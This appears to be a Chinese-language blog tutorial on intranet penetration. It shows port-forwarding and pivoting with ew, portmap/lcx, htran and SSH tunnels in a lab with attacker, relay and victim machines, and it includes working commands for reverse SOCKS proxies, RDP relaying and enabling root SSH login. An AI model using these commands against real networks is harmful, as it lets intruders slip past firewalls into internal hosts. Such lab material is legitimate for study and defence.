80端口攻击_内网端口转发工具的使用总结
0x00 ew端口轉發
0x01 portmap端口轉發
0x02 htran端口轉發
0x03 ssh端口轉發
0x00 ew端口轉發
環境準備
攻擊機 ? ?win7(物理機) 192.168.30.84
公網機 ? ?kali ? ? ? ? ? 192.168.30.131
受害機 ? ?win7(虛擬機) 192.168.30.126 ?(開啟phpstudy服務)(請忽略攻擊機和受害機的交互)
正向代理
1.物理機直接訪問公網機,公網機未建立lamp環境,所以無法訪問。
2.通過公網機將5555端口轉發到受害機的80端口,就可以訪問受害機的80端口。
3.發現訪問5555端口,訪問到了受害機的80端口。
反向代理
1.主機訪問http://127.0.0.1/phpmyadmin/index.php,無法連接。
2.公網機(kali)運行./ew_for_linux -s rcsocks -l 5555 -e 6666 ?將5555的流量轉發到6666端口,開啟監聽。
3.受害機(win7虛擬機)運行 ew_for_win_32.exe -s rssocks -d 192.168.32.100 -e 6666 流量轉發成功。
4.攻擊機(win7物理機)配置proxifer
點擊 配置文件-->代理服務器-->添加公網機(配置如下)--->確定
配置文件-->代理規則-->選擇代理-->確定
5.再次訪問127.0.0.1/phpmyadmin訪問成功,訪問到了受害機的phpmyadmin。
0x01 portmap端口轉發
工具最初使用的初衷是內網滲透,需要將內網ssh端口轉發到外網服務器上。但這個工具同樣適用于運維工程師進行遠程內網維護。
在windows下使用是lcx,在linux使用時為portmap。
前提:內網可以訪問外網,檢測方法就是直接ping一個外網IP即可。
下載地址:http://www.vuln.cn/wp-content/uploads/2016/06/lcxvuln.cn.zip
再本節,為了操作結果明顯,故使用ssh(22)端口作為轉發端口。
環境準備
公網機(我這里是阿里云centos) 47.240.62.93
受害機(kali虛擬機) ? ? ? ? ? 192.68.23.149
攻擊機(虛擬機centos) ?
外網主機設置
1.外網主機開啟6666和7777端口
2.設置portmap權限為777
kali開啟ssh服務
1.修改/etc/ssh/sshd_config配置文件:
vi /etc/ssh/sshd_config
2.找到#PasswordAuthentication yes
把“#”去掉
3.找到# PermitRootLogin prohibit-password ?改為PermitRootLogin yes
4.啟動ssh服務
/etc/init.d/ssh start
5.設置開機自動啟動
update-rc.d ssh enable
反向代理
1.虛擬主機執行 ?
./portmap -m 2 -p1 6666 -h2 47.240.62.93 -p2 7777
開始監聽6666傳來的數據,然后監聽7777端口提供訪問
2.kali虛擬機執行? ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 ?
將內網主機22端口的流量轉發到公網主機的6666端口。
3.再本地centos虛擬機測試是否可以連接。使用ssh root@47.240.62.93 -p 7777
0x02 htran端口轉發
環境準備
Win7物理機 ?192.168.30.84
Win7虛擬機 ?192.168.30.126
Win03虛擬機 192.168.23.129
情景:
一.服務器處于公網,可直接訪問,已經開啟3389,防火墻禁止直接連接3389
二.服務器處于公網,攻擊機需要連接服務器所處內網的受害機。
使用方法:
本地監聽轉發
-p -listen ConnectPort TransmitPort
指定主機端口轉發
-p -tran ConnectPort TransmitHost TransmitPort
將指定主機(TransmitHost)的指定端口轉發到指定主機的指定端口,待連接的主機(ConnectHost)需先處于監聽模式
-p -slave ConnectHost ConnectPort TransmitHost TransmitPort
端口轉發
1.將3389端口轉發到其他端口進行連接。
使用htran20.exe -p -tran 3333 127.0.0.1 3389
3389端口已經轉發到3333端口,輸入192.168.23.129:3333連接。
2.攻擊機監聽端口,受害機轉發端口到攻擊機監聽的端口。
攻擊機(Win7虛擬機)監聽端口
受害機(Win03虛擬機)轉發端口
Win7物理機訪問win7虛擬機9999端口即可
0x03 ssh端口轉發
準備:
A機器 ?本地linux虛擬機 ? ? centos ? ? 192.168.23.147
B機器 ?公網機 ? ? ? ? ? ? ?centos ? ? 47.240.62.93
A機器添加bbb用戶
B機器添加aaa用戶
B機器開啟7280和1234端口
使用方法:
反向代理 ssh -fCNR
正向代理 ssh -fCNL
-f 后臺執行ssh指令
-C 允許壓縮數據
-N 不執行遠程指令
-R 將遠程主機(服務器)的某個端口轉發到本地端指定機器的指定端口
-L 將本地機(客戶機)的某個端口轉發到遠端指定機器的指定端口
-p 指定遠程主機的端口
端口轉發:
1.建立A機器到B機器的反向代理
ssh -fCNR 7280:localhost:22 aaa@47.240.62.93
檢查是否啟動? ps aux | grep ssh
2.B機器正向代理,實現端口轉發,來連接A機器。
ssh -fCNL *:1234:localhost:7280 localhost
檢查是否啟用? ps aux | grep ssh
1234端口為本地轉發端口,負責和外網進行通信,并將數據轉發的7280這個端口,實現了可以從其他機器訪問的功能。
*代表所有可以接受任何ip的訪問
3.在B機器上輸入命令ssh -p1234 bbb@47.240.62.93
在上面指定了1234端口為轉發端口,故用1234端口登陸,然后bbb是內網A機器的用戶名,47.240.62.93為公網B機器的IP地址。
測試:
輸入ip a查看當前ip,確認為A機器ip,轉發成功。
總結
以上是生活随笔為你收集整理的80端口攻击_内网端口转发工具的使用总结的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux 查看正在执行的进程的pid编
- 下一篇: mac你没有权限打开应用程序_苹果mac